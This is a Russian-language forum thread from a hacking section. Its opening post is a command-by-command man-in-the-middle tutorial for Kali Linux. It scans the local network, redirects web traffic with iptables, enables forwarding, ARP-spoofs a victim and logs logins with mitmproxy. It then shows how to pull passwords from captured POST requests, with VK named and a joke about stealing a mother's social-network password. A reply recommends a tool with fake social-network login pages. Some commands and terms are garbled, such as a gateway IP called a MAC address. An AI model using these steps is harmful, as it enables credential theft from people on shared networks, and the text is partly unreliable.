Атака по методу MITM

Тема в разделе "Уязвимости и взлом", создана пользователем Fkeshl, 11 мар 2017.

  1. Fkeshl

    Fkeshl

    Сообщения:
    22
    Баллы:
    1
    Сразу скажу метод для линуксоидов, а именно Кали 2.0

    Сперва немного теории, буду объяснять своими словами
    Как это происходит? - У нас есть роутер, к ним подключены два компьютера. Компьютер хакера и компьютер жертвы. Компьютер хакера меняет свой мак адрес на адрес роутера, т.е. заставляет компьютер жертвы думать, что он роутер, и отправлять ему данные по протоколам. Компьютер хакера получает данные с роутера и пропускает их через себя, отправляя данные компьютеру жертве, при этом изменяется защищенный протокол на незащищенный (по этому можно спалиться, когда в адресной строке видно что протокол незащищенный или при авторизации на учтенки в некоторых браузерах и доменах не хочет пропускать). В компьютере хакера мы имеем весь лог запросов и отправок всяких данных с компьютера жертвы. Вот и вся теория, перейдем к практике.



    Сначала мы смотрим в консоли информацию о подключениях пк командой ifconfig
    Мы видим что у нас IP адрес, к примеру, 192.168.1.65

    Теперь с помощью команды
    fping -Asg 192.168.1.0/24 -r 5 >>fping.txt сканируем информацию о сети и записываем ее в файл fping.txt
    Где:
    1)
    192.168.1.0/24 - проводится сканирование по всем шлюзам от 0 до 255
    2) цифра
    5 между -r и >>fping.txt мы выбираем сколько раз мы будем сканировать сеть, лучше ее отсканить пару раз, так как за один раз может плохо отсканить и выдаст мало информации

    Здесь мы с помощью команды
    cat fping.txt | grep alive смотрим, кто находится в сети в режиме реального времени, т.е. юзают сеть, залазя в файл и находя строки с пометкой alive

    Мы получим список IP адресов которые сейчас юзают сеть.

    Смотрим мак адрес нашего роутера командой
    route -n.
    В колонке Gateway у нас первым елементом будет мак адрес роутера, к примеру, 192.168.1.100

    Роутер атаковать не имеет смысла, так как ничего полезного мы не добудем.

    Теперь нам нужно перенаправить траффик командами:

    iptables -t nat -A PREROUTING -p -tcp --destination-port 80 -j REDIRECT --to-port 8080
    iptables -t nat -A PREROUTING -p -tcp --destination-port 443 -j REDIRECT --to-port 8080


    Далее обрабатываем данные с помощью mitmproxy (если не установлен, то установите)
    Для этого пишем команду
    mitmproxy -T --host

    Потом нужно перенаправить данные командой echo 1 >/proc/sys/net/ipv4/ip_forward

    Потом запускаем сам процесс командой arpspoof -i eth0 -t 192.168.1.13 192.168.100
    Где 1-й айпишник это айпи жертвы, а 2-й айпишник роутера

    Дальше с этого момента, если кто-то с компьютера жертвы будет заходить в какую-то учетку, его данные для входа будут сохранены у нас в логах. Логи можно будет посмотреть в mitmproxy, когда вы закончите атаку.

    Далее в логах ищем строку, которая начинается со слова
    POST и смотрим на домен, если это учетка вконтакте, то там должно быть login.vk.com, нажимаем на нее, и там будут данные для входа.

    Ничего сложного, даже чайник розберется.
    Вот теперь ты знаешь как узнать пароль от одноклассников своей мамки))
    Удачи тебе в этом.


    Если нужно больше инфо, то тебе сюда:
    (не реклама)

    (не реклама)

    копипаст
  2. Yravnenie

    Yravnenie

    Сообщения:
    85
    Баллы:
    6
    урок конечно хороший, но по моему мнению для "WiFi чайников" подойдет больше Pumpkin, с графической оболочкой и как по мне с очень удачно реализованными фэйками всех известных соц сетей , почт итд. И работает все стабильние чем Mitmf-s , Mitmf-htts.
  3. kolesovnikita

    kolesovnikita

    Сообщения:
    75
    Баллы:
    6
  4. kolesovnikita

    kolesovnikita

    Сообщения:
    75
    Баллы:
    6
    Годнота одна)

Поделиться этой страницей

Top